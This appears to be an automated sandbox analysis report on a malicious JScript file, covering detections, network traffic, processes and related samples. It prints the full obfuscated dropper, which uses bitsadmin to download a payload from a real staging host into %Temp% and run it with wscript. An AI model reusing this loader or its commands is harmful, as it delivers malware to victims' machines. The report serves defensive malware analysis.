Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information12
Scripting
Valid AccountsWindows Management Instrumentation1
BITS Jobs
11
Process Injection
2
Virtualization/Sandbox Evasion
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job12
Scripting
1
DLL Side-Loading
1
BITS Jobs
LSASS Memory2
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading
Logon Script (Windows)11
Process Injection
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS22
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
New_Statement-8723107.js8%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
us-east-1.route-1.000webhost.awex.io
145.14.145.39
truefalse
    unknown
    aeroox.000webhostapp.com
    unknown
    unknowntrue
      unknown
      171.39.242.20.in-addr.arpa
      unknown
      unknownfalse
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000004.00000003.2235150076.00000207FC6E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drfalse
          unknown
          http://crl.ver)svchost.exe, 00000004.00000002.3507582577.00000207FC8A4000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110ttC:bitsadmin.exe, 00000002.00000002.2586300092.00000191D1D28000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://g.live.com/odclientsettings/Prod1C:edb.log.4.drfalse
                unknown
                https://aeroox.000webhostapp.com:443/dov/010111100110101101001111111101011011100101011110svchost.exe, 00000004.00000002.3507582577.00000207FC862000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110bitsadmin.exe, 00000002.00000002.2586300092.00000191D1D20000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3506655448.00000207F72AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3506935629.00000207F7B02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507582577.00000207FC884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507448837.00000207FC800000.00000004.00000020.00020000.00000000.sdmptrue
                    unknown
                    https://aeroox.000webhostapp.com/dov/0101111001101011010011111111010110111001010111101C:svchost.exe, 00000004.00000002.3506385344.00000066C71FB000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507840524.00000207FCA50000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2297842973.00000207FC6E1000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drfalse
                      unknown
                      https://aeroox.000webhostapp.com/dov/010111100110101wscript.exe, wscript.exe, 00000001.00000003.2586860487.0000020424D9B000.00000004.00000020.00020000.00000000.sdmptrue
                        unknown
                        https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110C:bitsadmin.exe, 00000002.00000002.2586300092.00000191D1D28000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          145.14.145.39
                          us-east-1.route-1.000webhost.awex.ioNetherlands
                          204915AWEXUSfalse
                          IP
                          127.0.0.1
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1524248
                          Start date and time:2024-10-02 17:24:08 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 27s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • GSI enabled (Javascript)
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:New_Statement-8723107.js
                          Detection:MAL
                          Classification:mal72.evad.winJS@7/3@2/2
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .js
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: New_Statement-8723107.js
                          TimeTypeDescription
                          11:25:09API Interceptor2x Sleep call for process: svchost.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          145.14.145.39XbIsXrWalr.dllGet hashmaliciousUnknownBrowse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            us-east-1.route-1.000webhost.awex.io670un9Ls5U.vbsGet hashmaliciousXWormBrowse
                            • 145.14.144.105
                            payload_1.vbsGet hashmaliciousXWormBrowse
                            • 145.14.145.86
                            zoom_invite-2514503.jsGet hashmaliciousUnknownBrowse
                            • 145.14.145.161
                            violation_report-0053170.jsGet hashmaliciousUnknownBrowse
                            • 145.14.144.32
                            zoom_invite-2514503.jsGet hashmaliciousUnknownBrowse
                            • 145.14.145.85
                            violation_report-0053170.jsGet hashmaliciousUnknownBrowse
                            • 145.14.145.107
                            reported_account-3133028.jsGet hashmaliciousUnknownBrowse
                            • 145.14.145.70
                            reported_violation-6847129.jsGet hashmaliciousUnknownBrowse
                            • 145.14.144.79
                            reported_account-3133028.jsGet hashmaliciousUnknownBrowse
                            • 145.14.144.61
                            reported_violation-6847129.jsGet hashmaliciousUnknownBrowse
                            • 145.14.144.77
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            AWEXUS670un9Ls5U.vbsGet hashmaliciousXWormBrowse
                            • 145.14.144.105
                            payload_1.vbsGet hashmaliciousXWormBrowse
                            • 145.14.145.86
                            zoom_invite-2514503.jsGet hashmaliciousUnknownBrowse
                            • 145.14.145.161
                            violation_report-0053170.jsGet hashmaliciousUnknownBrowse
                            • 145.14.144.32
                            zoom_invite-2514503.jsGet hashmaliciousUnknownBrowse
                            • 145.14.145.85
                            violation_report-0053170.jsGet hashmaliciousUnknownBrowse
                            • 145.14.145.107
                            reported_account-3133028.jsGet hashmaliciousUnknownBrowse
                            • 145.14.145.70
                            reported_violation-6847129.jsGet hashmaliciousUnknownBrowse
                            • 145.14.144.79
                            reported_account-3133028.jsGet hashmaliciousUnknownBrowse
                            • 145.14.144.61
                            reported_violation-6847129.jsGet hashmaliciousUnknownBrowse
                            • 145.14.144.77
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousCredential FlusherBrowse
                            • 145.14.145.39
                            https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2eGet hashmaliciousHTMLPhisherBrowse
                            • 145.14.145.39
                            file.exeGet hashmaliciousCredential FlusherBrowse
                            • 145.14.145.39
                            file.exeGet hashmaliciousCredential FlusherBrowse
                            • 145.14.145.39
                            file.exeGet hashmaliciousCredential FlusherBrowse
                            • 145.14.145.39
                            file.exeGet hashmaliciousUnknownBrowse
                            • 145.14.145.39
                            file.exeGet hashmaliciousCredential FlusherBrowse
                            • 145.14.145.39
                            https://svsjie.us9.list-manage.com/track/click?u=65baddd8dc4a29452f1a28eb2&id=dde4f4d149&e=6d04ecfe32Get hashmaliciousUnknownBrowse
                            • 145.14.145.39
                            test.exeGet hashmaliciousBabadedaBrowse
                            • 145.14.145.39
                            exit.exeGet hashmaliciousBabadedaBrowse
                            • 145.14.145.39
                            No context
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1310720
                            Entropy (8bit):0.7456993296784059
                            Encrypted:false
                            SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0N:9JZj5MiKNnNhoxuARmmmM
                            MD5:612A17328AD9CF08032DBF2454DEE064
                            SHA1:7B369D151E6103DC34EF708857C5DD392B791B25
                            SHA-256:E60C07FDC657A35DC7F4F9509CC74E214B76ED82EEA31DD00583422556C6BBEC
                            SHA-512:4BB62BAA41675B6DF0ADF805C508DD90CD85374E2D87597D11D55CB882CFAC52A57BBF9B7C77EE20F1E2FC924A206002668285FD193913084862CADE933F9257
                            Malicious:false
                            Reputation:low
                            Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                            Process:C:\Windows\System32\svchost.exe
                            File Type:Extensible storage user DataBase, version 0x620, checksum 0x2021eb5d, page size 16384, DirtyShutdown, Windows version 10.0
                            Category:dropped
                            Size (bytes):1310720
                            Entropy (8bit):0.7555807433920828
                            Encrypted:false
                            SSDEEP:1536:tSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:tazaSvGJzYj2UlmOlOL
                            MD5:EDA33454130D1A76A3A1ADC9B83C0A5F
                            SHA1:A91D76CD29AB158203EF2A045AE2C0F7670AF3EC
                            SHA-256:DCCAAB0403CBB70946A7B04AD20C24798430069BA9F352A78B5E176E757478CB
                            SHA-512:E62FF8ACB922BE6DA52716CA381D2C5366274497583CF0AC4AE5A81AC27E0D544EBBC5409C4E95FA8195A95420DDE30F4A5FE85EF382B59566B384EACF930FE2
                            Malicious:false
                            Reputation:low
                            Preview: !.]... .......7.......X\...;...{......................0.e......!...{?......|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{....................................[Y.....|....................m......|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.07894048318949429
                            Encrypted:false
                            SSDEEP:3:kuKYeb7i3EcvfNaAPaU1lYsTall/lalluxmO+l/SNxOf:kuKzb7SNDPaUgsTq/AgmOH
                            MD5:6081770E6AC4904458D09BA63DBD05D5
                            SHA1:E912AFBC6809061EEDD179E13B6B7C440D535429
                            SHA-256:360998A8DD56D1EF691458544105D6E20C180680260E0CB562B04CF0606D9A54
                            SHA-512:D5CF8C343A0ADAFDE90102168DFD4CBB6B71E7BAC3FB908798272DB087261382AE17318A40A1A6A368CE8D84516E829DB740F8368B53B2DBC1DBAF370C08E1E4
                            Malicious:false
                            Reputation:low
                            Preview:.........................................;...{.......|...!...{?..........!...{?..!...{?..g...!...{?...................m......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            File type:Unicode text, UTF-8 text, with very long lines (6942), with CRLF line terminators
                            Entropy (8bit):3.41959458902154
                            TrID:
                            • Digital Micrograph Script (4001/1) 100.00%
                            File name:New_Statement-8723107.js
                            File size:268'280 bytes
                            MD5:e435fc1fc9a3a3fb5133758ab9ea7e85
                            SHA1:c59f9c185c510fa8458b1a84594107c77b7a1222
                            SHA256:9bd5b1deaeb42874154d08cf30c677b22b028a880aaa1e0e51eb7955ba44f162
                            SHA512:4e15fd0c79137b60381aa0cf11e685d8509c9a6e2707f554e01b8a603e8da3a969efa724936540a97119dc9babe606f7a3e3de0cb98d7832140f310bf1c52cd4
                            SSDEEP:192:ir+nr+nr+nr+nr+nr+nr+nr+nr+nr+nr+nr+Yjqr+nr+nr+nr+nr+nr+nr+nr+nn:7xHR0J7PqFCR
                            TLSH:F9448226BEDBAE81ED1810251DB7492DEDA8376B41E1517AACC857906EC408C3FE6CF1
                            File Content Preview://11/1'.../...7...'.../'0......1.../01/1/1/.........76...1...1'...1'.../....../.........'...////0'70...'...0...6......1.../1......1...//...1/717/...//1......111/0//...61...6...107...7...//.../....../...0...6....../'.../.../...'.../......///...0...1....../
                            Icon Hash:68d69b8bb6aa9a86
                            TimestampSource PortDest PortSource IPDest IP
                            Oct 2, 2024 17:25:15.349570990 CEST49715443192.168.2.6145.14.145.39
                            Oct 2, 2024 17:25:15.349627018 CEST44349715145.14.145.39192.168.2.6
                            Oct 2, 2024 17:25:15.349685907 CEST49715443192.168.2.6145.14.145.39
                            Oct 2, 2024 17:25:15.351247072 CEST49715443192.168.2.6145.14.145.39
                            Oct 2, 2024 17:25:15.351263046 CEST44349715145.14.145.39192.168.2.6
                            Oct 2, 2024 17:25:15.865632057 CEST44349715145.14.145.39192.168.2.6
                            Oct 2, 2024 17:25:15.865792990 CEST49715443192.168.2.6145.14.145.39
                            Oct 2, 2024 17:25:15.868202925 CEST49715443192.168.2.6145.14.145.39
                            Oct 2, 2024 17:25:15.868216038 CEST44349715145.14.145.39192.168.2.6
                            Oct 2, 2024 17:25:15.868508101 CEST44349715145.14.145.39192.168.2.6
                            Oct 2, 2024 17:25:15.899058104 CEST49715443192.168.2.6145.14.145.39
                            Oct 2, 2024 17:25:15.943407059 CEST44349715145.14.145.39192.168.2.6
                            Oct 2, 2024 17:25:16.018884897 CEST44349715145.14.145.39192.168.2.6
                            Oct 2, 2024 17:25:16.019155025 CEST49715443192.168.2.6145.14.145.39
                            Oct 2, 2024 17:25:16.019187927 CEST44349715145.14.145.39192.168.2.6
                            Oct 2, 2024 17:25:16.019205093 CEST49715443192.168.2.6145.14.145.39
                            Oct 2, 2024 17:25:16.019222021 CEST44349715145.14.145.39192.168.2.6
                            TimestampSource PortDest PortSource IPDest IP
                            Oct 2, 2024 17:25:15.313047886 CEST5256253192.168.2.61.1.1.1
                            Oct 2, 2024 17:25:15.348582983 CEST53525621.1.1.1192.168.2.6
                            Oct 2, 2024 17:25:35.334604979 CEST5364637162.159.36.2192.168.2.6
                            Oct 2, 2024 17:25:35.848546982 CEST5508153192.168.2.61.1.1.1
                            Oct 2, 2024 17:25:35.858362913 CEST53550811.1.1.1192.168.2.6
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Oct 2, 2024 17:25:15.313047886 CEST192.168.2.61.1.1.10xd472Standard query (0)aeroox.000webhostapp.comA (IP address)IN (0x0001)false
                            Oct 2, 2024 17:25:35.848546982 CEST192.168.2.61.1.1.10x44c3Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Oct 2, 2024 17:25:15.348582983 CEST1.1.1.1192.168.2.60xd472No error (0)aeroox.000webhostapp.comus-east-1.route-1.000webhost.awex.ioCNAME (Canonical name)IN (0x0001)false
                            Oct 2, 2024 17:25:15.348582983 CEST1.1.1.1192.168.2.60xd472No error (0)us-east-1.route-1.000webhost.awex.io145.14.145.39A (IP address)IN (0x0001)false
                            Oct 2, 2024 17:25:35.858362913 CEST1.1.1.1192.168.2.60x44c3Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.649715145.14.145.394435560C:\Windows\System32\svchost.exe
                            TimestampBytes transferredDirectionData
                            2024-10-02 15:25:15 UTC199OUTHEAD /dov/010111100110101101001111111101011011100101011110 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            Accept-Encoding: identity
                            User-Agent: Microsoft BITS/7.8
                            Host: aeroox.000webhostapp.com
                            2024-10-02 15:25:16 UTC271INHTTP/1.1 424
                            Date: Wed, 02 Oct 2024 15:25:15 GMT
                            Content-Type: text/html
                            Content-Length: 5096
                            Connection: close
                            ETag: "65dc89a9-13e8"
                            Server: awex
                            X-Xss-Protection: 1; mode=block
                            X-Content-Type-Options: nosniff
                            X-Request-ID: 9d72fe1bd0bc84ea4aa71b9a68424983


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:1
                            Start time:11:25:08
                            Start date:02/10/2024
                            Path:C:\Windows\System32\wscript.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js"
                            Imagebase:0x7ff798150000
                            File size:170'496 bytes
                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:2
                            Start time:11:25:09
                            Start date:02/10/2024
                            Path:C:\Windows\System32\bitsadmin.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq
                            Imagebase:0x7ff7946c0000
                            File size:211'456 bytes
                            MD5 hash:01AAB62D5799F75B0D69EB29C1CA6855
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:3
                            Start time:11:25:09
                            Start date:02/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:11:25:09
                            Start date:02/10/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Imagebase:0x7ff7403e0000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:7
                            Start time:11:25:44
                            Start date:02/10/2024
                            Path:C:\Windows\System32\wscript.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq
                            Imagebase:0x7ff798150000
                            File size:170'496 bytes
                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Call Graph

                            • Executed
                            • Not Executed
                            callgraph clusterC0 clusterC2C0 clusterC4C2 E1C0 entry:C0 F5C4 run E1C0->F5C4 F3C2 ActiveXObject()

                            Script:

                            Code
                            0
                            var _dvrcnuxkdpttoluswdggoilgeabpjcjbmtbgidpfkjbsjvciacpzjiyixhxwlhohsdoilpofwoxhhu = 'WScript';
                              1
                              var _ldzfryssxncxpiyiolbxwenqacitjiwgokwvuekudlqfukhkkeohzdmsfbfxtfvylqbtkqixhoexul = 'Shell';
                                2
                                var _ngcotabpdrjdykbnjxnqndzzanpspljdzcvfcrnpbhhgpzxpeylezlvcsluopgvfemqljxrsomerue = 'ngcotabpdrjdykbnjxnqndzzanpspljdzcvfcrnpbhhgpzxpeylezlvcsluopgvfemqljxrsomerue';
                                  3
                                  var _lrklniztxfylagofqmvxmwdtcclyjmycbpofhaseiqmbxxzntgjooaoidxclcuirbggqwnrgdcjjde = 'Temp';
                                    4
                                    var _ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq = 'ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq';
                                      5
                                      var _gzkrywymatsibyuobflsglccillqvhxspnshjhiusyanvaqrlaonjhuzpcmwkbkqnplragopenydzm = 'gzkrywymatsibyuobflsglccillqvhxspnshjhiusyanvaqrlaonjhuzpcmwkbkqnplragopenydzm';
                                        6
                                        var _ywimcbuuobxkqtyruierskvojytgvyozxtngzpyuyoschrsxzsnhkoxuecxxpjbigiwqidssgkhliz = 'bitsadmin';
                                          7
                                          var _zcemckigwzlccroxjnmbzzgrequaekbxiiblxvcykacrohvhgplqseotqqvqyebrtjtbxlzjowxcrt = 'transfer';
                                            8
                                            var _qydlkwhhfyznttxjjxepmghjufnsoiqgeqciykezsctihljdotpqmhguvjfqujoqhcakvdpcbjflym = 'wscript //E:VBScript ';
                                              9
                                              var mujgkpckfxxsmnhqnynzhnenqywyalfwlbdjtwleqvqhwkpnnfeibrhytngibmdybapbsbmbiqlptt = new ActiveXObject ( _dvrcnuxkdpttoluswdggoilgeabpjcjbmtbgidpfkjbsjvciacpzjiyixhxwlhohsdoilpofwoxhhu + '.' + _ldzfryssxncxpiyiolbxwenqacitjiwgokwvuekudlqfukhkkeohzdmsfbfxtfvylqbtkqixhoexul );
                                                10
                                                var ngcotabpdrjdykbnjxnqndzzanpspljdzcvfcrnpbhhgpzxpeylezlvcsluopgvfemqljxrsomerue = '%' + _lrklniztxfylagofqmvxmwdtcclyjmycbpofhaseiqmbxxzntgjooaoidxclcuirbggqwnrgdcjjde + '%\\' + _ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq;
                                                  11
                                                  var gzkrywymatsibyuobflsglccillqvhxspnshjhiusyanvaqrlaonjhuzpcmwkbkqnplragopenydzm = 'https://';
                                                    12
                                                    var rdjmnvheoimsqfqmyzcpxumxbksxgfwrxdkmzsamctetpwkknhzybceuvotdatxeygpmeurwyaustg = 'aeroox.000webhostapp.';
                                                      13
                                                      var llfjfcstfkhpkgwvivxyacnsxciynrmmljjexcwjwnvmhrwacseidvxawchslmgmjngoqyjgbdydgl = 'com/dov/';
                                                        14
                                                        var abnbeitwhomwmfftbdscgnoecotvezqjajzznzeoqctdpowxlyikgnynomoqvjqifiqfrjczahcwlq = '010111100110101101001111111101011011100101011110';
                                                          15
                                                          var mipfnburwxuibqpnkmqjalezneebxratqhpzblqcmlzixsrkbgoyuyhyfydwsryfgnglagzyvamtit = _ywimcbuuobxkqtyruierskvojytgvyozxtngzpyuyoschrsxzsnhkoxuecxxpjbigiwqidssgkhliz + ' /' + _zcemckigwzlccroxjnmbzzgrequaekbxiiblxvcykacrohvhgplqseotqqvqyebrtjtbxlzjowxcrt + ' 8 ' + gzkrywymatsibyuobflsglccillqvhxspnshjhiusyanvaqrlaonjhuzpcmwkbkqnplragopenydzm + rdjmnvheoimsqfqmyzcpxumxbksxgfwrxdkmzsamctetpwkknhzybceuvotdatxeygpmeurwyaustg + llfjfcstfkhpkgwvivxyacnsxciynrmmljjexcwjwnvmhrwacseidvxawchslmgmjngoqyjgbdydgl + abnbeitwhomwmfftbdscgnoecotvezqjajzznzeoqctdpowxlyikgnynomoqvjqifiqfrjczahcwlq + ' ' + ngcotabpdrjdykbnjxnqndzzanpspljdzcvfcrnpbhhgpzxpeylezlvcsluopgvfemqljxrsomerue;
                                                            16
                                                            var ffrwdrlejmhkttztuccuvhkliikhhoclrzxqlmysuzjlorpvhdfcfayvzrfckzgaqvinhwnapeadbm = _qydlkwhhfyznttxjjxepmghjufnsoiqgeqciykezsctihljdotpqmhguvjfqujoqhcakvdpcbjflym + ngcotabpdrjdykbnjxnqndzzanpspljdzcvfcrnpbhhgpzxpeylezlvcsluopgvfemqljxrsomerue;
                                                              17
                                                              mujgkpckfxxsmnhqnynzhnenqywyalfwlbdjtwleqvqhwkpnnfeibrhytngibmdybapbsbmbiqlptt.run ( mipfnburwxuibqpnkmqjalezneebxratqhpzblqcmlzixsrkbgoyuyhyfydwsryfgnglagzyvamtit, 0, true );
                                                              • run("bitsadmin /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 %Temp%\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq",0,true) ➔ -2145844824
                                                              18
                                                              mujgkpckfxxsmnhqnynzhnenqywyalfwlbdjtwleqvqhwkpnnfeibrhytngibmdybapbsbmbiqlptt.run ( ffrwdrlejmhkttztuccuvhkliikhhoclrzxqlmysuzjlorpvhdfcfayvzrfckzgaqvinhwnapeadbm );
                                                              • run("wscript //E:VBScript %Temp%\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq") ➔ 0
                                                              Reset < >